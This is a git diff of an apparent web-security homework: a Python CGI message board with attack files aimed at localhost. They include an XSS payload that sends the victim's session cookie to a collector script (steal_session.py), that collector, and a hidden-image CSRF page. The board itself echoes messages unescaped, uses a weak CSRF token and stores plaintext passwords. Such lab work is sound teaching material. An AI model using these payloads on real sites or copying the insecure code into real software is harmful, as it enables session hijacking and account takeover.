diff options
Diffstat (limited to 'hw4')
| -rw-r--r-- | hw4/.gitignore | 3 | ||||
| -rw-r--r-- | hw4/cat.jpg | bin | 0 -> 50325 bytes | |||
| -rwxr-xr-x | hw4/cgi-bin/._board.py | bin | 0 -> 355 bytes | |||
| -rwxr-xr-x | hw4/cgi-bin/._login.py | bin | 0 -> 299 bytes | |||
| -rwxr-xr-x | hw4/cgi-bin/._logout.py | bin | 0 -> 299 bytes | |||
| -rwxr-xr-x | hw4/cgi-bin/._output.py | bin | 0 -> 299 bytes | |||
| -rwxr-xr-x | hw4/cgi-bin/._post.py | bin | 0 -> 299 bytes | |||
| -rwxr-xr-x | hw4/cgi-bin/._steal_session.py | bin | 0 -> 299 bytes | |||
| -rwxr-xr-x | hw4/cgi-bin/board.py | 21 | ||||
| -rwxr-xr-x | hw4/cgi-bin/login.py | 39 | ||||
| -rwxr-xr-x | hw4/cgi-bin/logout.py | 23 | ||||
| -rwxr-xr-x | hw4/cgi-bin/output.py | 97 | ||||
| -rwxr-xr-x | hw4/cgi-bin/post.py | 39 | ||||
| -rwxr-xr-x | hw4/cgi-bin/steal_session.py | 24 | ||||
| -rw-r--r-- | hw4/csrf.html | 14 | ||||
| -rw-r--r-- | hw4/index.html | 1 | ||||
| -rw-r--r-- | hw4/messages | 4 | ||||
| -rw-r--r-- | hw4/sessions | 0 | ||||
| -rw-r--r-- | hw4/simple-xss.txt | 1 | ||||
| -rw-r--r-- | hw4/stolen_sessions | 0 | ||||
| -rw-r--r-- | hw4/users | 2 |
21 files changed, 268 insertions, 0 deletions
diff --git a/hw4/.gitignore b/hw4/.gitignore new file mode 100644 index 0000000..8a80dbd --- /dev/null +++ b/hw4/.gitignore @@ -0,0 +1,3 @@ +*.pyc +*.log + diff --git a/hw4/cat.jpg b/hw4/cat.jpg Binary files differnew file mode 100644 index 0000000..1890aa8 --- /dev/null +++ b/hw4/cat.jpg diff --git a/hw4/cgi-bin/._board.py b/hw4/cgi-bin/._board.py Binary files differnew file mode 100755 index 0000000..ef20daa --- /dev/null +++ b/hw4/cgi-bin/._board.py diff --git a/hw4/cgi-bin/._login.py b/hw4/cgi-bin/._login.py Binary files differnew file mode 100755 index 0000000..26100f6 --- /dev/null +++ b/hw4/cgi-bin/._login.py diff --git a/hw4/cgi-bin/._logout.py b/hw4/cgi-bin/._logout.py Binary files differnew file mode 100755 index 0000000..9d1f260 --- /dev/null +++ b/hw4/cgi-bin/._logout.py diff --git a/hw4/cgi-bin/._output.py b/hw4/cgi-bin/._output.py Binary files differnew file mode 100755 index 0000000..25267ab --- /dev/null +++ b/hw4/cgi-bin/._output.py diff --git a/hw4/cgi-bin/._post.py b/hw4/cgi-bin/._post.py Binary files differnew file mode 100755 index 0000000..fc9cd5d --- /dev/null +++ b/hw4/cgi-bin/._post.py diff --git a/hw4/cgi-bin/._steal_session.py b/hw4/cgi-bin/._steal_session.py Binary files differnew file mode 100755 index 0000000..69e619e --- /dev/null +++ b/hw4/cgi-bin/._steal_session.py diff --git a/hw4/cgi-bin/board.py b/hw4/cgi-bin/board.py new file mode 100755 index 0000000..5ca8afc --- /dev/null +++ b/hw4/cgi-bin/board.py @@ -0,0 +1,21 @@ +#!/usr/bin/env python2.7 +import Cookie, os, time +import re +import uuid +import cgi +import cgitb + +cgitb.enable() ## allows for debugging errors from the cgi scripts in the browser + +from output import * + +cookie = Cookie.SimpleCookie() # for writing cookies +form = cgi.FieldStorage() # for reading GET datas + +if not Login(): + DisplayLogin() + +# if we get here, this is an authorized user, let's print the messages +PrintMessages() + +exit(0) diff --git a/hw4/cgi-bin/login.py b/hw4/cgi-bin/login.py new file mode 100755 index 0000000..a308dde --- /dev/null +++ b/hw4/cgi-bin/login.py @@ -0,0 +1,39 @@ +#!/usr/bin/env python2.7 +import Cookie, os, time +import re +import uuid +import cgi +import cgitb +import random + +from output import * + +cgitb.enable() ## allows for debugging errors from the cgi scripts in the browser + +cookie = Cookie.SimpleCookie() # for writing cookies +cookie_string = os.environ.get('HTTP_COOKIE') # for reading cookies +form = cgi.FieldStorage() # for reading GET data + +login = form.getvalue('username') +password = form.getvalue('password') +with open('users', 'r') as users: + s = users.read() + if s.find(login + ' ' + password) == -1: + ShowError() + + # else set session id cookie and store it in the file! + s_id = uuid.uuid4().hex + cookie['session_id'] = s_id # login + + # xss protection -- set session_id cookie to httpOnly + cookie['session_id']['httponly'] = '1' + + with open("sessions", "a") as myfile: + # csrf protection -- session token construction + random.seed() + csrfToken = str(random.random()) + myfile.write(s_id + ' ' + login + ' ' + csrfToken + '\n') + + print cookie + +RedirectToBoard() diff --git a/hw4/cgi-bin/logout.py b/hw4/cgi-bin/logout.py new file mode 100755 index 0000000..9d64800 --- /dev/null +++ b/hw4/cgi-bin/logout.py @@ -0,0 +1,23 @@ +#!/usr/bin/env python2.7 +import Cookie, os, time +import re +import uuid +import cgi +import cgitb + +from output import * + +cgitb.enable() ## allows for debugging errors from the cgi scripts in the browser + +cookie = Cookie.SimpleCookie() # for writing cookies +form = cgi.FieldStorage() # for reading GET data + +message = form.getvalue('message') + +user = Login() +if not user: + ShowError() + exit(0) + +RemoveAllUserSessions(user) +RedirectToBoard() diff --git a/hw4/cgi-bin/output.py b/hw4/cgi-bin/output.py new file mode 100755 index 0000000..544ac60 --- /dev/null +++ b/hw4/cgi-bin/output.py @@ -0,0 +1,97 @@ +import os +import re + +def DisplayLogin(): + print 'Content-Type: text/html\n' + print '<html><body>' + print """ + <div id="container"> + <form action="login.py" method="get"> + <label for="username">Username:</label> + <input type="text" id="username" name="username"> + <label for="password">Password:</label> + <input type="password" id="password" name="password"> + <div id="lower"> + <input type="submit" value="Login"> + </div><!--/ lower--> + </form> + </div> + """ + print '</body></html>' + exit(0) + +def PrintMessages(): + print 'Content-Type: text/html\n' + print '<html><body>' + + with open("messages", "r") as m_file: + s = m_file.read() + l = s.split('\n') + for i in l: + if len(i) == 0: + continue + i.replace('\\n','\n') + print i + print '<br><br>' + print """ + <br><br> + <form action="post.py" method="post" style="display:inline"> + <input type="hidden" name="csrfToken" value=""" + + # csrf protection -- session token sendoff + s_id = os.environ.get('HTTP_COOKIE').split('=')[1] # for reading cookies + + with open('sessions', 'r') as s_file: + for line in s_file: + if s_id in line: + print line.split()[2] + + print """ + <label for="message">Message:</label><br> + <textarea rows="4" cols="50" name="message"></textarea> + <br> + <input type="submit" value="Post"></form> + """ + print """ + <form action="logout.py" style="display:inline"> + <input type="submit" value="Logout" /> + </form> + """ + + print '</body></html>' + +def ShowError(): + print 'Content-Type: text/html\n' + print '<html><body>' + print '<h2> Error ocured :P </h2>' + print '</body></html>' + exit(0) + +def Login(): + cookie_string = os.environ.get('HTTP_COOKIE') # for reading cookies + g = re.search('session_id=(\w+)', cookie_string) # if g==None -- no cookie + if not g: + return False + with open('sessions', 'r') as s_file: + s = s_file.read() + sid = g.group(1) + g = re.search(sid + ' ' + '(\w+)', s) + if not g: + return False + return g.group(1) + +def RedirectToBoard(): + #go back to board.py + print 'Content-Type: text/html\n' + print '<meta http-equiv="refresh" content="0; url=board.py" />' + exit(0) + +def RemoveAllUserSessions(user): + tmp = '' + f = open('sessions', 'r') + for line in f: + if user not in line: + tmp += line + f.close() + with open('sessions','w') as f: + f.write(tmp) diff --git a/hw4/cgi-bin/post.py b/hw4/cgi-bin/post.py new file mode 100755 index 0000000..2a0bf8c --- /dev/null +++ b/hw4/cgi-bin/post.py @@ -0,0 +1,39 @@ +#!/usr/bin/env python2.7 +import Cookie, os, time +import re +import uuid +import cgi +import cgitb + +from output import * + +cgitb.enable() # allows for debugging errors from the cgi scripts in the browser + +cookie = Cookie.SimpleCookie() # for writing cookies +form = cgi.FieldStorage() # for reading POST data + +message = form.getvalue('message') + +user = Login() +if not user: + ShowError() + +if message == None: # to prevent posting empty messages + RedirectToBoard() + +# csrf protection -- check for csrfToken +csrfToken = form.getvalue('csrfToken') + +if csrfToken is None: + ShowError() + +with open('sessions', 'r') as s_file: + for line in s_file: + if user in line and not csrfToken in line: + ShowError() + +message = message.replace('\n','\n') +with open('messages','a') as m: + m.write(user + ': ' + message + '\n') + +RedirectToBoard() diff --git a/hw4/cgi-bin/steal_session.py b/hw4/cgi-bin/steal_session.py new file mode 100755 index 0000000..df84de6 --- /dev/null +++ b/hw4/cgi-bin/steal_session.py @@ -0,0 +1,24 @@ +#!/usr/bin/env python2.7 +import Cookie, os, time +import re +import uuid +import cgi +import cgitb + +from output import * + +cgitb.enable() ## allows for debugging errors from the cgi scripts in the browser + +cookie = Cookie.SimpleCookie() # for writing cookies +form = cgi.FieldStorage() # for reading GET data + +session = form.getvalue('session') + +if session: + with open('stolen_sessions','a') as m: + m.write(session + '\n') + +#Send victim to homepage so they don't notice anything! +print 'Content-Type: text/html\n' +print '<html><body><p style="font-size:25px"><img src="http://icons.iconarchive.com/icons/iconsmind/outline/512/Evil-icon.png" height=50 width=50 align="middle"></img> We got your session key <img src="http://icons.iconarchive.com/icons/iconsmind/outline/512/Evil-icon.png" height=50 width=50 align="middle"></img></p></body></html>' +exit(0) diff --git a/hw4/csrf.html b/hw4/csrf.html new file mode 100644 index 0000000..3e8cdae --- /dev/null +++ b/hw4/csrf.html @@ -0,0 +1,14 @@ +<html> +<title> Innocent page </title> +<body> +<h2>This is innocent page, here is a picture of a cute cat: </h2> <br> + +<img src="cat.jpg"> + +<!-- Insert your CSRF attack here. For example you can use another hidden <img> to +generate an HTTP request to post.py to write something from victim --> + +<img src="http://127.0.0.1:8000/cgi-bin/post.py?message=i%20am%20not%20l33t" width="0" height="0" border="0"> + +</body> +</html> diff --git a/hw4/index.html b/hw4/index.html new file mode 100644 index 0000000..74c862d --- /dev/null +++ b/hw4/index.html @@ -0,0 +1 @@ +<meta http-equiv="refresh" content="0; url=cgi-bin/board.py" /> diff --git a/hw4/messages b/hw4/messages new file mode 100644 index 0000000..5a94cc2 --- /dev/null +++ b/hw4/messages @@ -0,0 +1,4 @@ +user: The weather is nice today +user: This site seems secure +hacker: I wouldn't be so sure about that... +user: Lol diff --git a/hw4/sessions b/hw4/sessions new file mode 100644 index 0000000..e69de29 --- /dev/null +++ b/hw4/sessions diff --git a/hw4/simple-xss.txt b/hw4/simple-xss.txt new file mode 100644 index 0000000..1862081 --- /dev/null +++ b/hw4/simple-xss.txt @@ -0,0 +1 @@ +<script> var tmp = '<iframe src="http://127.0.0.1:8000/cgi-bin/steal_session.py?session=' + document.cookie.split('=')[1] + '" frameBorder="0" width="1000" height="90"></iframe>'; document.write(tmp)</script> diff --git a/hw4/stolen_sessions b/hw4/stolen_sessions new file mode 100644 index 0000000..e69de29 --- /dev/null +++ b/hw4/stolen_sessions diff --git a/hw4/users b/hw4/users new file mode 100644 index 0000000..7059371 --- /dev/null +++ b/hw4/users @@ -0,0 +1,2 @@ +user 1234 +hacker 4321 |
